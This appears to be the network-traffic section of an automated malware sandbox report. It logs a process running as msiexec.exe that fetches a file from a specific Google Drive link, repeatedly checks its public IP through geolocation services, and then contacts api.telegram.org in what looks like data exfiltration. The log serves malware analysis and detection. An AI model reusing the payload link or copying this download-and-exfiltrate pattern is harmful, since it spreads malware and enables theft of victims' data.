                                                                                                                                            Jan 10, 2025 17:17:43.117873907 CET5938780192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:43.117873907 CET5938780192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:43.122667074 CET8059387132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:43.970401049 CET8059387132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:43.971704006 CET59388443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:43.971750021 CET44359388104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:43.971827984 CET59388443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:43.972069025 CET59388443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:43.972083092 CET44359388104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:44.022914886 CET5938780192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:44.441827059 CET44359388104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:44.443561077 CET59388443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:44.443581104 CET44359388104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:44.605806112 CET44359388104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:44.606307030 CET44359388104.21.80.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:44.606364965 CET59388443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:44.606792927 CET59388443192.168.2.7104.21.80.1
                                                                                                                                            Jan 10, 2025 17:17:44.631685019 CET5938780192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:44.636787891 CET8059387132.226.8.169192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:44.636925936 CET5938780192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:44.639570951 CET59389443192.168.2.7149.154.167.220
                                                                                                                                            Jan 10, 2025 17:17:44.639611959 CET44359389149.154.167.220192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:44.639672041 CET59389443192.168.2.7149.154.167.220
                                                                                                                                            Jan 10, 2025 17:17:44.640052080 CET59389443192.168.2.7149.154.167.220
                                                                                                                                            Jan 10, 2025 17:17:44.640063047 CET44359389149.154.167.220192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:45.260929108 CET44359389149.154.167.220192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:45.261064053 CET59389443192.168.2.7149.154.167.220
                                                                                                                                            Jan 10, 2025 17:17:45.263329983 CET59389443192.168.2.7149.154.167.220
                                                                                                                                            Jan 10, 2025 17:17:45.263346910 CET44359389149.154.167.220192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:45.263597012 CET44359389149.154.167.220192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:45.265517950 CET59389443192.168.2.7149.154.167.220
                                                                                                                                            Jan 10, 2025 17:17:45.307344913 CET44359389149.154.167.220192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:45.508671045 CET44359389149.154.167.220192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:45.508749008 CET44359389149.154.167.220192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:45.508797884 CET59389443192.168.2.7149.154.167.220
                                                                                                                                            Jan 10, 2025 17:17:45.511564016 CET59389443192.168.2.7149.154.167.220
                                                                                                                                            Jan 10, 2025 17:17:51.428757906 CET5937580192.168.2.7132.226.8.169
                                                                                                                                            Jan 10, 2025 17:17:51.641355991 CET59390443192.168.2.7149.154.167.220
                                                                                                                                            Jan 10, 2025 17:17:51.641392946 CET44359390149.154.167.220192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:51.641469002 CET59390443192.168.2.7149.154.167.220
                                                                                                                                            Jan 10, 2025 17:17:51.641760111 CET59390443192.168.2.7149.154.167.220
                                                                                                                                            Jan 10, 2025 17:17:51.641776085 CET44359390149.154.167.220192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:52.312544107 CET44359390149.154.167.220192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:52.314609051 CET59390443192.168.2.7149.154.167.220
                                                                                                                                            Jan 10, 2025 17:17:52.314635992 CET44359390149.154.167.220192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:52.314692974 CET59390443192.168.2.7149.154.167.220
                                                                                                                                            Jan 10, 2025 17:17:52.314702034 CET44359390149.154.167.220192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:52.781054974 CET44359390149.154.167.220192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:52.781152964 CET44359390149.154.167.220192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:52.781224966 CET59390443192.168.2.7149.154.167.220
                                                                                                                                            Jan 10, 2025 17:17:52.781594992 CET59390443192.168.2.7149.154.167.220
                                                                                                                                            Jan 10, 2025 17:17:54.302210093 CET59391443192.168.2.7149.154.167.220
                                                                                                                                            Jan 10, 2025 17:17:54.302259922 CET44359391149.154.167.220192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:54.302339077 CET59391443192.168.2.7149.154.167.220
                                                                                                                                            Jan 10, 2025 17:17:54.302580118 CET59391443192.168.2.7149.154.167.220
                                                                                                                                            Jan 10, 2025 17:17:54.302591085 CET44359391149.154.167.220192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:54.938596964 CET44359391149.154.167.220192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:54.940761089 CET59391443192.168.2.7149.154.167.220
                                                                                                                                            Jan 10, 2025 17:17:54.940788984 CET44359391149.154.167.220192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:54.940867901 CET59391443192.168.2.7149.154.167.220
                                                                                                                                            Jan 10, 2025 17:17:54.940872908 CET44359391149.154.167.220192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:55.367031097 CET44359391149.154.167.220192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:55.367115021 CET44359391149.154.167.220192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:55.367333889 CET59391443192.168.2.7149.154.167.220
                                                                                                                                            Jan 10, 2025 17:17:55.367594004 CET59391443192.168.2.7149.154.167.220
                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Jan 10, 2025 17:15:54.950998068 CET5362604162.159.36.2192.168.2.7
                                                                                                                                            Jan 10, 2025 17:15:55.430579901 CET53625681.1.1.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:25.506494045 CET6224353192.168.2.71.1.1.1
                                                                                                                                            Jan 10, 2025 17:17:25.514187098 CET53622431.1.1.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:26.622594118 CET5222853192.168.2.71.1.1.1
                                                                                                                                            Jan 10, 2025 17:17:26.630315065 CET53522281.1.1.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:30.217174053 CET5234653192.168.2.71.1.1.1
                                                                                                                                            Jan 10, 2025 17:17:30.223922014 CET53523461.1.1.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:31.980509996 CET5700353192.168.2.71.1.1.1
                                                                                                                                            Jan 10, 2025 17:17:31.987757921 CET53570031.1.1.1192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:44.632281065 CET5119153192.168.2.71.1.1.1
                                                                                                                                            Jan 10, 2025 17:17:44.639070988 CET53511911.1.1.1192.168.2.7
                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                            Jan 10, 2025 17:17:25.506494045 CET192.168.2.71.1.1.10xf276Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 10, 2025 17:17:26.622594118 CET192.168.2.71.1.1.10x64d9Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 10, 2025 17:17:30.217174053 CET192.168.2.71.1.1.10x6c2bStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                            Jan 10, 2025 17:17:31.980509996 CET192.168.2.71.1.1.10x32acStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                            Jan 10, 2025 17:17:44.632281065 CET192.168.2.71.1.1.10x62b5Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                            Jan 10, 2025 17:17:25.514187098 CET1.1.1.1192.168.2.70xf276No error (0)drive.google.com216.58.206.46A (IP address)IN (0x0001)false
                                                                                                                                            Jan 10, 2025 17:17:26.630315065 CET1.1.1.1192.168.2.70x64d9No error (0)drive.usercontent.google.com142.250.186.129A (IP address)IN (0x0001)false
                                                                                                                                            Jan 10, 2025 17:17:30.223922014 CET1.1.1.1192.168.2.70x6c2bNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 10, 2025 17:17:30.223922014 CET1.1.1.1192.168.2.70x6c2bNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                            Jan 10, 2025 17:17:30.223922014 CET1.1.1.1192.168.2.70x6c2bNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                            Jan 10, 2025 17:17:30.223922014 CET1.1.1.1192.168.2.70x6c2bNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                            Jan 10, 2025 17:17:30.223922014 CET1.1.1.1192.168.2.70x6c2bNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                            Jan 10, 2025 17:17:30.223922014 CET1.1.1.1192.168.2.70x6c2bNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                            Jan 10, 2025 17:17:31.987757921 CET1.1.1.1192.168.2.70x32acNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                            Jan 10, 2025 17:17:31.987757921 CET1.1.1.1192.168.2.70x32acNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                            Jan 10, 2025 17:17:31.987757921 CET1.1.1.1192.168.2.70x32acNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                            Jan 10, 2025 17:17:31.987757921 CET1.1.1.1192.168.2.70x32acNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                            Jan 10, 2025 17:17:31.987757921 CET1.1.1.1192.168.2.70x32acNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                            Jan 10, 2025 17:17:31.987757921 CET1.1.1.1192.168.2.70x32acNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                            Jan 10, 2025 17:17:31.987757921 CET1.1.1.1192.168.2.70x32acNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                            Jan 10, 2025 17:17:44.639070988 CET1.1.1.1192.168.2.70x62b5No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                            • drive.google.com
                                                                                                                                            • drive.usercontent.google.com
                                                                                                                                            • reallyfreegeoip.org
                                                                                                                                            • api.telegram.org
                                                                                                                                            • checkip.dyndns.org
                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.2.759372132.226.8.169807864C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Jan 10, 2025 17:17:30.233901024 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Jan 10, 2025 17:17:31.071775913 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 10 Jan 2025 16:17:30 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                            Jan 10, 2025 17:17:31.355133057 CET127OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Jan 10, 2025 17:17:31.632733107 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 10 Jan 2025 16:17:31 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                            Jan 10, 2025 17:17:32.625464916 CET127OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Jan 10, 2025 17:17:32.921567917 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 10 Jan 2025 16:17:32 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            1192.168.2.759375132.226.8.169807864C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Jan 10, 2025 17:17:33.564125061 CET127OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Jan 10, 2025 17:17:34.392492056 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 10 Jan 2025 16:17:34 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            2192.168.2.759377132.226.8.169807864C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Jan 10, 2025 17:17:35.028141022 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Jan 10, 2025 17:17:35.893280983 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 10 Jan 2025 16:17:35 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            3192.168.2.759379132.226.8.169807864C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Jan 10, 2025 17:17:36.678400040 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Jan 10, 2025 17:17:37.793323040 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 10 Jan 2025 16:17:37 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            4192.168.2.759381132.226.8.169807864C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Jan 10, 2025 17:17:38.431283951 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Jan 10, 2025 17:17:39.307950020 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 10 Jan 2025 16:17:39 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            5192.168.2.759383132.226.8.169807864C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Jan 10, 2025 17:17:40.041066885 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Jan 10, 2025 17:17:40.874217033 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 10 Jan 2025 16:17:40 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            6192.168.2.759385132.226.8.169807864C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Jan 10, 2025 17:17:41.488456964 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Jan 10, 2025 17:17:42.309870958 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 10 Jan 2025 16:17:42 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            7192.168.2.759387132.226.8.169807864C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Jan 10, 2025 17:17:43.117873907 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Jan 10, 2025 17:17:43.970401049 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 10 Jan 2025 16:17:43 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.2.759370216.58.206.464437864C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-10 16:17:26 UTC216OUTGET /uc?export=download&id=1Rl2Q3jifSIE7VULdNBFwLR_HP9yjBG3k HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                            Host: drive.google.com
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            2025-01-10 16:17:26 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                            Content-Type: application/binary
                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                            Date: Fri, 10 Jan 2025 16:17:26 GMT
                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=1Rl2Q3jifSIE7VULdNBFwLR_HP9yjBG3k&export=download
                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                            Content-Security-Policy: script-src 'nonce-f66pECgX1xjZGEKp2UBERQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                            Server: ESF
                                                                                                                                            Content-Length: 0
                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                            Connection: close


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            1192.168.2.759371142.250.186.1294437864C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-10 16:17:27 UTC258OUTGET /download?id=1Rl2Q3jifSIE7VULdNBFwLR_HP9yjBG3k&export=download HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Host: drive.usercontent.google.com
